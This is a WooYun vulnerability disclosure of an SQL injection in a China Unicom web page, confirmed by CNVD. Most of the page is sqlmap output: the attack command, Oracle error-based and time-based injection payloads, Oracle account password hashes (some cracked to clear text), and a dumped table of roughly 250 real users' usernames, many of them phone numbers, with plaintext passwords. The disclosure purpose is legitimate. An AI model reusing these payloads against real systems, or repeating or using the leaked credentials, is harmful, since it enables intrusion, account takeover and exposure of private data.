关注数(24 )
提交时间:2015-12-01 13:38
修复时间:2016-01-18 13:50
公开时间:2016-01-18 13:50
漏洞详情 披露状态:
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-04: 厂商已经确认,细节仅向厂商公开 2015-12-14: 细节向核心白帽子及相关领域专家公开 2015-12-24: 细节向普通白帽子公开 2016-01-03: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
./sqlmap.py -u "http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1" -p name
--- Parameter: name (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: province=31&type=1&name=1' AND 8515=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (8515=8515) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(122)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL) AND 'WRhY' LIKE 'WRhY&companytype=11&page=1 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: province=31&type=1&name=1' AND 7020=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'UZfg' LIKE 'UZfg&companytype=11&page=1 --- [12:01:22] [INFO] the back-end DBMS is Oracle web server operating system: Windows 2003 or XP web application technology: ASP.NET, Microsoft IIS 6.0, ASP back-end DBMS: Oracle available databases [7]: [*] CTXSYS [*] EXFSYS [*] MDSYS [*] OLAPSYS [*] SYS [*] SYSTEM [*] TSH_CMS
[*] _NEXT_USER [1]: password hash: NULL [*] ANONYMOUS [1]: password hash: anonymous [*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL [*] AQ_USER_ROLE [1]: password hash: NULL [*] AUTHENTICATEDUSER [1]: password hash: NULL [*] CONNECT [1]: password hash: NULL [*] CTXAPP [1]: password hash: NULL [*] CTXSYS [1]: password hash: 71E687F036AD56E5 [*] CWM_USER [1]: password hash: NULL [*] DBA [1]: password hash: NULL [*] DBSNMP [1]: password hash: 8A7084606AE5EB5C [*] DELETE_CATALOG_ROLE [1]: password hash: NULL [*] DIP [1]: password hash: CE4A36B8E06CA59C clear-text password: DIP [*] DMSYS [1]: password hash: BFBA5A553FD9E28A [*] EJBCLIENT [1]: password hash: NULL [*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL [*] EXFSYS [1]: password hash: 66F4EF5650C20355 [*] EXP_FULL_DATABASE [1]: password hash: NULL [*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL [*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL [*] HS_ADMIN_ROLE [1]: password hash: NULL [*] IMP_FULL_DATABASE [1]: password hash: NULL [*] JAVA_ADMIN [1]: password hash: NULL [*] JAVA_DEPLOY [1]: password hash: NULL [*] JAVADEBUGPRIV [1]: password hash: NULL [*] JAVAIDPRIV [1]: password hash: NULL [*] JAVASYSPRIV [1]: password hash: NULL [*] JAVAUSERPRIV [1]: password hash: NULL [*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL [*] MDDATA [1]: password hash: DF02A496267DEE66 clear-text password: MDDATA [*] MDSYS [1]: password hash: 72979A94BAD2AF80 [*] MGMT_USER [1]: password hash: NULL [*] MGMT_VIEW [1]: password hash: 935F95FB02BB4765 [*] OEM_ADVISOR [1]: password hash: NULL [*] OEM_MONITOR [1]: password hash: NULL [*] OLAP_DBA [1]: password hash: NULL [*] OLAP_USER [1]: password hash: NULL [*] OLAPI_TRACE_USER [1]: password hash: NULL [*] OLAPSYS [1]: password hash: 4AC23CC3B15E2208 [*] ORACLE_OCM [1]: password hash: 5A2E026A9157958C [*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00 [*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F clear-text password: ORDSYS [*] OUTLN [1]: password hash: 4A3BA55E08595C81 [*] PUBLIC [1]: password hash: NULL [*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL [*] RESOURCE [1]: password hash: NULL [*] SCHEDULER_ADMIN [1]: password hash: NULL [*] SELECT_CATALOG_ROLE [1]: password hash: NULL [*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3 clear-text password: SI_INFORMTN_SCHEMA [*] SJSC [1]: password hash: F78A2CA3C9FC1704 clear-text password: SJSC [*] SYS [1]: password hash: 75800913E1B66343 [*] SYSMAN [1]: password hash: 28F72A3C2D75FDE9 [*] SYSTEM [1]: password hash: 970BAA5B81930A40 [*] TSH_CMS [1]: password hash: AB00BC770037B5D7 [*] TSMSYS [1]: password hash: 3DF26A8B17D0F29F [*] UNISK_TEST [1]: password hash: 273DB3E97685FF90 [*] UNITEST [1]: password hash: A2E8021EA6E17874 clear-text password: UNITEST [*] UNIWO [1]: password hash: FF370F03D3985606 clear-text password: UNIWO [*] WM_ADMIN_ROLE [1]: password hash: NULL [*] WMSYS [1]: password hash: 7C9BA362F8314299 [*] XDB [1]: password hash: 88D8364765FCE6AF [*] XDBADMIN [1]: password hash: NULL [*] XDBWEBSERVICES [1]: password hash: NULL
+------------------+--------------------------------------------+------+ | USERNAME | PASSWORD | MAIL | +------------------+--------------------------------------------+------+ [14:39:17] [WARNING] console output will be trimmed to last 256 rows due to large table size | 15611112502 | dididi | NULL | | suhua | 751226 | NULL | | Zlakiroran | 19861224 | NULL | | yangyonghong | 20010804 | NULL | | mengqk | 600212 | NULL | | tz6lbj | 666666 | NULL | | jiali906 | 850906 | NULL | | bintang | dubint | NULL | | 13104683304 | 123456 | NULL | | suifengerqu | 541888 | NULL | | 13011530114 | 13011530114 | NULL | | 15612036025 | 15612036025 | NULL | | 13003610508 | 13003610508 | NULL | | 18642900631 | 7034030 | NULL | | 1864111 | 870306 | NULL | | shanhewose | a19890701 | NULL | | 18641112809 | 123456 | NULL | | lcliuliu | 123456 | NULL | | mmibb | mm | NULL | | santongfan | fantaoWUUNI | NULL | | zhaozd | 123456 | NULL | | lcyy | lhbhi20060318 | NULL | | loveyou | lcylovesq1314 | NULL | | ccc111cc | ccc111 | NULL | | wangxx | 135790 | NULL | | GLCHENG | mtwfhqpy | NULL | | hongqi93 | 100789 | NULL | | lanmao | 20890701 | NULL | | zhoukaixuan | 111222 | NULL | | mallpall | 421514 | NULL | | liusg36 | 922384 | NULL | | ZHANJUN | 101715 | NULL | | 18641119588 | 18641119588 | NULL | | ewsd1240 | yxb0305 | NULL | | ffy123 | DLffy123 | NULL | | hebiao | 840921 | NULL | | 15637101282 | 123456 | NULL | | ibincn | zhangbin930812 | NULL | | lmj16578658 | 916718 | NULL | | 15637006129 | 006129 | NULL | | 15554163558 | 710310 | NULL | | renny | 535106 | NULL | | 15513075167 | 15513075167 | NULL | | yingzi | cwz741109 | NULL | | hnsmxxr | abc123 | NULL | | 116117 | 116117 | NULL | | stillme | wang10121986 | NULL | | 992478972 | 516536 | NULL | | liantng131 | 13134175685 | NULL | | 18641115750 | 123456 | NULL | | cpcuibm | 191028 | NULL | | sovi | 147258 | NULL | | Gaoxzcf | 13519025155 | NULL | | 15609715655 | 111111 | NULL | | yushijin | 123456 | NULL | | fax6688 | 800120 | NULL | | ghostli100 | 19890118 | NULL | | leizi | 154813519 | NULL | | gotoyes | 200300 | NULL | | 1057 | 20102010 | NULL | | dhl0118 | 782163 | NULL | | gvei | gvei169 | NULL | | baoxiuyun | 730211 | NULL | | xjmacky | 760526 | NULL | | 13193148804 | 111111 | NULL | | ymeng | 123456 | NULL | | 13014512670 | 839502 | NULL | | aaaa | 761216 | NULL | | 15516945883 | 15516945883 | NULL | | 326034825 | 1108865595 | NULL | | yangyong | 412726 | NULL | | jixinhua | 198610 | NULL | | 13259792689 | 000000 | NULL | | 13277226161 | 111222 | NULL | | 1598 | 131132 | NULL | | wo186 | 131132 | NULL | | shanshui | 988989 | NULL | | chenlong1982 | 562743 | NULL | | suixiaogang | 198726 | NULL | | seamanlay | 5667561 | NULL | | 9060 | 983986 | NULL | | 1395 | 168600 | NULL | | qingyuan | 925123 | NULL | | tonydhj | dhj5211314 | NULL | | yangguangjiyi | 410325325410 | NULL | | chenlifeng | chen13076799410 | NULL | | chinacows | woaini19850622 | NULL | | 809298077 | cpj49928 | NULL | | Lauken | 330410 | NULL | | zhiqiu | 100100981031 | NULL | | ABCD1107631825 | 031125 | NULL | | lujiaolong | 04050905 | NULL | | ahat | 720507 | NULL | | xiangxiang | 909955 | NULL | | cheng | chengyining2007 | NULL | | yfsok | 62665822 | NULL | | 446209495 | xing13266416556 | NULL | | haode | 0306 | NULL | | a46182898 | a19870205 | NULL | | wxhwrygj | 14971590 | NULL | | 8622 | 850178 | NULL | | wuqian520 | shizhongruyiqian | NULL | | Lijh | li56780 | NULL | | 574006683 | 3021087 | NULL | | trx00000 | 780720 | NULL | | yjpyjp | 733209 | NULL | | q703986096 | 101901 | NULL | | weixl | 114263 | NULL | | 13297666826 | 768203 | NULL | | 13204385056 | 13204385056 | NULL | | 798388561 | 13409201794 | NULL | | 13280801626 | 1626 | NULL | | sntewg | 870713 | NULL | | 282413 | 101707 | NULL | | gbz18 | 189376 | NULL | | liuyanginchina | 371522 | NULL | | 18656611719 | 737499 | NULL | | lijiang1006 | ok13963099724 | NULL | | 7919 | 131132 | NULL | | ylqs001 | iedibrd5 | NULL | | 7933 | 198312 | NULL | | 868498 | 131132 | NULL | | 0395 | 131132 | NULL | | qwertyuiop | 147258 | NULL | | wangtao | 853260 | NULL | | yanghong | 123456789 | NULL | | yanpen | 198403 | NULL | | zhangkai | zhangkai | NULL | | pelva | 820625 | NULL | | 15636050408 | 691910 | NULL | | shibo | 60236435231 | NULL | | QINHUIXIN | 123456 | NULL | | huangwei | 123456789 | NULL | | 15585535380 | 680326680326 | NULL | | long | ojl | NULL | | mechelle | 11701170 | NULL | | ym3188 | 112019 | NULL | | 15948009185 | 123456 | NULL | | jlbclwt | 58541240 | NULL | | et1987 | et1987 | NULL | | aqatg20110906 | 392691 | NULL | | smxlhl | 2863079 | NULL | | 13212003558 | 19840302 | NULL | | mininaso | miyuxin | NULL | | sy123321 | 135246 | NULL | | 18641116753 | 18641116753 | NULL | | dlxhrj | 495602 | NULL | | zhaicj1 | 123321 | NULL | | 18604921297 | 861120 | NULL | | fenxiang | 19770428 | NULL | | wangsuiyi | 412413 | NULL | | gxl2011 | 654321 | NULL | | huyiling | 915915 | NULL | | zakuan | aa123456 | NULL | | bhrc | 123456a | NULL | | yf661 | 131132 | NULL | | sjz881 | 131132 | NULL | | zhanglishang | rshqch2009 | NULL | | zgf869 | dlpass9869 | NULL | | unisk001 | 20001123 | NULL | | zhangliping | 198610 | NULL | | xinyue | 198610 | NULL | | sk9998 | 117988 | NULL | | lxxycl | yang9257954 | NULL | | haidao | 710224 | NULL | | 13277226262 | 111222 | NULL | | yangyang | 549175 | NULL | | ltwz | 9365131 | NULL | | xadf001 | 12837123 | NULL | | 4921998 | lei20031022 | NULL | | csic_lw | 15319907931 | NULL | | wangxu | 1234 | NULL | | qingxian | 653368 | NULL | | jaycntw1 | 1990531 | NULL | | 907396 | 201310 | NULL | | bynd419 | 002315 | NULL | | wsb76778945 | 951357 | NULL | | 13256308679 | 222222 | NULL | | hero191000 | 8272882728 | NULL | | shaniuniu | 494662493 | NULL | | hl8865067 | 830801 | NULL | | 821829540 | 880815 | NULL | | wu0019 | 830111 | NULL | | 13098444446 | 111222 | NULL | | ZHAOQIANG | 19910110 | NULL | | 1589 | 131132 | NULL | | fayen | 123456 | NULL | | laoma | 6602618 | NULL | | mingzhu | 662256 | NULL | | 18602896237 | 252831 | NULL | | 15607360638 | 822600 | NULL | | 15607360639 | 000111 | NULL | | teldzh | taoenli | NULL | | chinaunicom | 123456 | NULL | | shenxiaoqiao | 800526 | NULL | | yangangyuan | 230201 | NULL | | 68834634 | 010010001a | NULL | | 454084893 | 511123 | NULL | | hp815 | 188486 | NULL | | love_880809 | 809809 | NULL | | wsniuxiaoniu | 12908819niu | NULL | | 547914367 | 917190 | NULL | | sun0000 | 830618 | NULL | | jinyanfighting | jinyan0710 | NULL | | kalen | 13756045542 | NULL | | 13253469087 | 555555 | NULL | | zzybv | 756430 | NULL | | dongxiahaohao | zhangdongxia | NULL | | 15637809263 | 881213 | NULL | | mxy3000 | 4172705 | NULL | | 735667822 | 13071031803 | NULL | | leiboby | 123465 | NULL | | 15639609281 | 790417 | NULL | | gongzheng | gongzheng | NULL | | kfhglt | li8282033 | NULL | | zhouhui888 | 811111 | NULL | | fxgfan | 0210746 | NULL | | hnsc888 | 761217 | NULL | | weilai | abc | NULL | | longbao1126 | 19921126 | NULL | | yueastor | 274256601 | NULL | | 453867817 | a64758053 | NULL | | yangjunlei | yangjunlei | NULL | | wanglibin | 721545 | NULL | | wwweizhen | 15837975923 | NULL | | leungloh | WiFi3GChina | NULL | | 376386271 | 19890910 | NULL | | dxtjy | 123456 | NULL | | 3655 | 13014593655 | NULL | | hbqinbo | hnqinbo | NULL | | ycy1022 | 404470019 | NULL | | 131371723231 | 052217 | NULL | | yangand2008 | 197259 | NULL | | zhuchangyong | 13290965985 | NULL | | ilsunbo | sunbohao | NULL | | yinkunji8888 | 2525131425 | NULL | | a76740087 | 76740087 | NULL | | 15637102026 | hy5668518 | NULL | | 880815 | 821829540 | NULL | | 15585302777 | 521512 | NULL | | 666666 | 200300 | NULL | | shenxiaomei | 657306 | NULL | | wxyh | lhbhi20060318 | NULL | | 13220226687 | gao7322845 | NULL | | 13242440255 | 0807 | NULL | | zhujing6 | 001368 | NULL | | kouhz1 | 111111 | NULL | | Houzj8 | hzj670624 | NULL | | lczx | 000635 | NULL | | Andy | 888999 | NULL | | 2653 | 131132 | NULL | | 18651278512 | 612523 | NULL | | asdf | 376891217 | NULL | | 83377948 | 19850612 | NULL | | 13146300852 | 820222 | NULL | | 13146601103 | 6601103 | NULL | +------------------+--------------------------------------------+------+
修复方案: 版权声明:转载请注明来源 李旭敏 @乌云
漏洞回应 厂商回应: 危害等级:高
确认时间:2015-12-04 13:44
厂商回复: CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报,由其后续协调网站管理部门处置。
最新状态: 暂无